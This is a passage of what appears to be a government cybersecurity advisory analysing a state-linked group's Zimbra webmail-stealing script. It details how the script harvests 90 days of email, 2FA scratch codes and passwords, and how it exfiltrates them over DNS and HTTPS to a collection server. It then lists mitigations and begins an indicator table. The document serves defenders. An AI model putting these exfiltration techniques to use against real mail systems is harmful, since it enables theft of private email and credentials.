<p>During the <em>gather_environment</em> stage, the script attempts to determine which type of ZCS webmail client the victim is using. The script checks the user’s current URL to determine the client type being used, checking for certain indicators (shown in <a href="https://www.cisa.gov/#table2"><strong>Table 2</strong></a>) to determine the client type. The corresponding value is then used as the payload when exfiltrating the client type.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 2: ZCS webmail client types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Indicator </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Client Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Associated Value </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>?client=advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/h/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Standard </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>h </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/modern/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Modern </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>m </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>As part of collection, the script attempts to harvest any emails not marked as “junk” from the last 90 days from the victim’s account. Emails are collected daily by an HTTP GET request to the URL path, “/home/~/?fmt=tgz&amp;meta=0&amp;query=date:-{DAY_OFFSET}d AND (not in:junk)”. The <em>{DAY_OFFSET}</em> value would be between 0 and 89 representing how many days ago the email was sent or received. To prevent redundant collection and exfiltration of emails, a variable with a name based on the email date being queried, using a format of <em>zd_comp_YYYY-MM-DD</em>, and value of <em>true</em>, is saved to the <em>window.top.localStorage</em> property. This variable is saved regardless of whether the email is successfully exfiltrated.  </p>
<p>According to Mozilla documentation, if the user is not in a private browsing session, any data stored to localStorage does not typically expire. This means that if the user happens to execute the script again from the same computer, the script avoids attempting to re-exfiltrate previously captured emails. However, the script always attempts to pull any emails with a <em>{DAY_OFFSET} </em>of zero. In other words, the script always pulls emails sent or received the same day it is run. After email results are returned from the query for each day of email activity, those results are then passed to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section.</p>
<p>The script also provides LAUNDRY BEAR with telemetry on any errors that occur during the collection process. This is accomplished by executing any collection or exfiltration code through helper functions that contain error handling logic. If an error occurs, a payload containing information on the error itself, the context of the error happening, and the stage in which the error occurred is sent to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. For cases where the error occurs within a SOAP request, “:api” is concatenated to the stage value in the payload. If an error occurs during the batch SOAP requests that occur when collecting the GAL of the victim, the stage value will use a format of <em>gather_gal:{VAL}:api</em>. The <em>{VAL}</em> placeholder indicates which batch request, a number from 0 to 19, the error occurred in. Errors that occur during the password autocomplete interception process will use “gather_autocomplete_password:dom” for the stage value. Finally, if an error occurs when attempting to collect or exfiltrate a specific day’s emails, the stage will include which day the error occurred on, using the previously defined placeholder <em>{DAY_OFFSET},</em> with a format of <em>sendArchive:day-{DAY_OFFSET}</em>.</p>
<h3><em><strong>Exfiltration</strong></em><a class="ck-anchor"></a></h3>
<p>At the end of each stage in the collection process, the script attempts to exfiltrate acquired information to Flowerbed. The script primarily relies on two forms of data exfiltration: DNS [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank">T1048.003</a>] and HTTPS. Some information is exfiltrated over both the DNS and HTTPS channels.</p>
<p>Prior to exfiltration, a randomized 10- or 11-character alphanumeric string is generated as an identifier for the victim. This identifier is included in the URL of both the DNS- and HTTPS-based exfiltration.  </p>
<h4><strong>DNS exfiltration</strong></h4>
<p>DNS exfiltration occurs through DNS A record queries. To ensure data exfiltrated through DNS is not corrupted when traversing through non-actor-controlled DNS infrastructure, <em>Ulej </em>maintains compliance with RFC 1035, Domain Names - Implementation and Specification, specifically accounting for the case insensitivity and subdomain length requirements. Base32 encoding is used to create a case-insensitive payload. Once the payload is encoded, a period (“.”) is added every 60 characters to ensure each subdomain is under 63 characters long. The script then creates a new image object sourced from a URL with the scheme defined in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a>. Any traffic involving DNS exfiltration will have “d-“ prefixing the victim identifier, and the subdomain immediately following indicates the type of information being exfiltrated.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure6.png?itok=Tv8RT8o8" width="1024" height="49" alt="Figure 6: Structure for information exfiltrated by DNS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 6: Structure for information exfiltrated by DNS</strong></em></figcaption>
  </figure>
<p>When the script generates an image object, the browser tries to retrieve the complete domain of the URL specified as the source of the image. This triggers a DNS request sent to the actor-controlled server and processed by Flowerbed. <a href="https://www.cisa.gov/#table3"><strong>Table 3</strong></a> lists both the information exfiltrated via DNS and their corresponding data type identifiers in the DNS queries.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 3: DNS exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Data Type </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>e </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Client Type </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Zimbra Version </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment  </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>v </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>URL at Time of Exploitation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2FA Scratch Codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2fa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pw </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<h4><strong>HTTPS exfiltration</strong></h4>
<p>Any information exfiltrated via DNS is also exfiltrated through HTTPS, as well as additional data including email content, contacts, attachments, and error logging information. By using Let’s Encrypt certificates, this group can quickly deploy new infrastructure and leverage encrypted HTTPS communications with valid server certificates when exfiltrating information from the victim’s environment. The HTTPS exfiltration capability only uses two HTTP content types, defined in <a href="https://www.cisa.gov/#table4"><strong>Table 4</strong></a>. Traffic associated with HTTPS exfiltration will use the URL scheme shown in <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 4: HTTPS exfiltration types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>Content Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>URL Path </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/json </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/p </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/octet-stream </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/d </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%207.png?itok=CdTcyMdN" width="1024" height="50" alt="Figure 7: Structure for information exfiltrated by HTTPS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 7: Structure for information exfiltrated by HTTPS</strong></em></figcaption>
  </figure>
<p>Some of the data transmitted via HTTPS uses the standard JSON content type format. The script includes the information in a POST request to actor-controlled infrastructure.  </p>
<p><a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> provides a summary of the JSON-based exfiltration.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 5: HTTPS JSON exfiltration  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>JSON Key(s) </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>email </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Client Type, Version, and Current URL </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>client, version, full_url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>app_password </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>autocomplete_password </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script transmits all HTTPS exfiltration not identified in <a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> using the Octet-Stream content type as binary data. The POST requests for this method include a filename in the “X-Filename” header. Traditionally, developers use headers prefixed with “X-” to denote custom headers that do not follow a defined standard. The purpose of including this header remains unclear since the Catcher capability ignores the provided filename when saving the data. <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> summarizes the data exfiltrated in this format.</p>
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<div class="TableContainer Ltr SCXW189907655 BCX8">
<div class="WACAltTextDescribedBy SCXW189907655 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong> Table 6: HTTPS binary exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>X-Filename Header </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetScratchCodesRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Victim Organization’s Global Address List </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetry_{1-20}.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Last 90 Days of Victim’s Emails </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>sendArchives </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetryData_{0-89}.json </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The script sends all exfiltrated data identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> to the Catcher service exactly as received from the SOAP request in a JSON payload, except for email exfiltration. For email exfiltration, the script sends it as a GZIP compressed archive [<a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank">T1560</a>]. Although most of the exfiltration consists of valid JSON, the script still attempts to exfiltrate all information identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> using the application/octet-stream content typing rather than application/json.</p>
<p>At the beginning and end of the collection and exfiltration activity, during the <em>sendStartPing</em> and <em>sendFinishPing </em>stages respectively, the script submits a POST request with a JSON payload to indicate that the script is starting or finishing execution. Throughout execution, the script also logs error events and send the logs using similar JSON payloads. The script sends the JSON in a POST request to the URL documented in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>, using a URL path of “/v/p” and with a “subtype” key that shows which type of action it logged (<em>start, finish, or error</em>).  </p>
<h4><strong>Catcher</strong></h4>
<p><em>Ulej </em>exfiltrates information to Flowerbed to be handled by a service named Catcher. Catcher is a containerized Python application, running in Docker as part of Flowerbed, which is detailed in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section. It receives exfiltrated data and temporarily stores it, enabling its eventual transfer to infrastructure designed for long-term, secure storage.</p>
<p>Catcher acts as an HTTP server over port 8000 and a DNS server on port 53. As described in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section, the Flowerbed project uses an additional Docker container running an Nginx reverse proxy to enable HTTPS support. This reverse proxy uses a certificate generated by Let’s Encrypt and forwards all traffic with an SNI containing “*.i.*” to port 8000 within the Catcher container.</p>
<p>The DNS service can accept A, AAAA, MX, TXT, and CAA queries. For any MX, AAAA, or CAA queries, the server will always provide an empty response. The system only supports TXT records as needed to process Automatic Certificate Management Environment (ACME) requests, which enable the assignment of Let’s Encrypt certificates. If the server receives an A query, Catcher will always respond with the public IP address of the Flowerbed server.  </p>
<p>However, if a query includes a domain formatted as shown in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>, the service saves a log file in JSON format to disk containing the following details of the DNS query:</p>
<ul>
<li>Time of query,</li>
<li>Source IP address for query,</li>
<li>Queried domain, and</li>
<li>Type of query.</li>
</ul>
<p>The HTTP server typically responds with OK, except in cases where the path is “pixel.gif” when the response contains a 1x1 gif image with a SHA-256 hash of ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629. Like the DNS service, the HTTP service will only log entries when the domain found in the host header of the request follows the expected formatting as seen in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>. As the HTTPS exfiltration uses non-standardized binary and JSON-formatted payloads when exfiltrating to Catcher, Catcher will check the content type of the request. If the content type is set to “application/json”, Catcher encodes the data in Base64 and includes it in the JSON log entry written to disk. If the content type is set to any other value, Catcher leaves the Base64 payload in the JSON log entry blank and saves the payload to a separate file with the same filename as the JSON log entry with a “.bin” file extension. An HTTPS exfiltration event causes Catcher to save a JSON formatted log file to disk containing the following information from the HTTP request:</p>
<ul>
<li>Time,</li>
<li>Source IP address,</li>
<li>Request method,</li>
<li>Host,</li>
<li>Path,</li>
<li>Query string,</li>
<li>Headers, and</li>
<li>Base64 payload.</li>
</ul>
<p>These JSON event log files and binary output files are then initially saved to the directory <em>/root/hits/tmp</em> and later moved to the <em>/root/hits/ready</em> directory once processed. This prevents incomplete files, which are still being uploaded to Catcher, from premature exfiltration from the server. Approximately every 60 seconds, a likely automated workflow establishes a Secure Shell (SSH) connection with the server hosting Flowerbed for a few seconds, almost certainly exfiltrating the data processed by Catcher to non-public-facing infrastructure. The command in <a href="https://www.cisa.gov/#figure8"><strong>Figure 8</strong></a> also executes hourly to remove all files last modified at least two days ago from the <em>/root/hits/ready</em> directory.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%208-Command%20used%20for%20automated%20directory%20cleanup.png?itok=IqvZvbLK" width="1024" height="92" alt="Figure 8: Command used for automated directory cleanup">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 8: Command used for automated directory cleanup</strong></em></figcaption>
  </figure>
<h2><strong>Response strategies</strong></h2>
<h3><em><strong>Mitigations</strong></em><a class="ck-anchor"></a></h3>
<p>In many cases, by the time an organization identifies a compromise related to this campaign, numerous sensitive and proprietary emails have already been exfiltrated. The significant risk posed by this cyber threat emphasizes the importance for organizations that use ZCS and other similar webmail solutions to take proactive steps to mitigate this risk.</p>
<p>All organizations that use the ZCS webmail service should <strong>immediately prioritize</strong> ensuring that their ZCS is not running a vulnerable version. A patch for <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> was released for both 10.1.13 and 10.0.18 versions of ZCS [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening">D3-AH</a>]. If immediate patching is not feasible, organizations should advise employees to use alternative mail clients to access email and avoid using the Classic ZCS webmail client until ZCS is updated to a non-vulnerable version [<a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank">d3f:Isolate</a>].</p>
<p>System administrators should closely monitor any Internet-connected ZCS or other email systems and the workstations that access those systems and promptly apply available software updates [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank">D3-AH</a>]. Administrators can maintain awareness of active vulnerability exploitation by referencing open source resources, including <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA’s Known Exploited Vulnerabilities Catalog</a> and <a href="https://www.ncsc.gov.uk/collection/vulnerability-management/guidance/responding-to-active-exploitation" target="_blank">NCSC-UK’s Responding to active exploitation of vulnerabilities</a> guidance.</p>
<p>Organizations should consider using a third-party authentication service that supports passkeys for authentication to mediate access to ZCS and other services that do not natively support passkeys. By doing so, organizations can work to eliminate the possibility of automated password collection from autocomplete or password reuse [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank">D3-CH</a>]. However, Application Passcodes may still be necessary and should be monitored closely.  </p>
<p>Organizations should implement network monitoring capabilities with collection and short-term retention of packet capture or NetFlow data and maintain log collection and storage [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainLogCollectionStorage3Q">CPG 3.Q</a>]. This will allow organizations to monitor for and identify suspicious network activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IdentifyAdverseEvents4B">CPG 4.B</a>], such as:</p>
<ul>
<li>Significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank">D3-NTA</a>];</li>
<li>Frequent DNS queries for a suspicious domain with seemingly random subdomains [<a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank">D3-DNSTA</a>];</li>
<li>A sudden spike of connections to a server associated with a recently established domain [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>]; and  </li>
<li>Connections to internal services, such as webmail, from VPN providers frequently leveraged by this group for nefarious activity, such as Mullvad VPN [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>].</li>
</ul>
<p>Additionally, for organizations that can inspect the content of outbound HTTPS connections via break-and-inspect infrastructure, security teams should identify traffic matching the characteristics described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory.</p>
<h3><em><strong>Indicators of compromise (IOCs)</strong></em><a class="ck-anchor"></a></h3>
<h4><strong>Flowerbed infrastructure</strong></h4>
<p>The following indicators have been attributed to use by LAUNDRY BEAR for their campaign targeting ZCS’s webmail service as of the publication of this advisory. (<strong>Disclaimer: </strong>Due to the frequency of operational structure changes by this group, these indicators are intended solely for historic attribution purposes. Some indicators, such as IPs, compromised emails, and domains, may be outdated, so organizations should check for current activity before acting on these IOCs.) <a href="https://www.cisa.gov/#table7"><strong>Table 7</strong></a> provides details about the server infrastructure used to host Flowerbed, and <a href="https://www.cisa.gov/#table8"><strong>Table 8</strong></a> lists the corresponding SHA-1 hash values for the Let’s Encrypt certificates used by that infrastructure [<a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank">D3-IAA</a>].</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 7: Flowerbed server infrastructure</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Domain </strong></p>
</div>
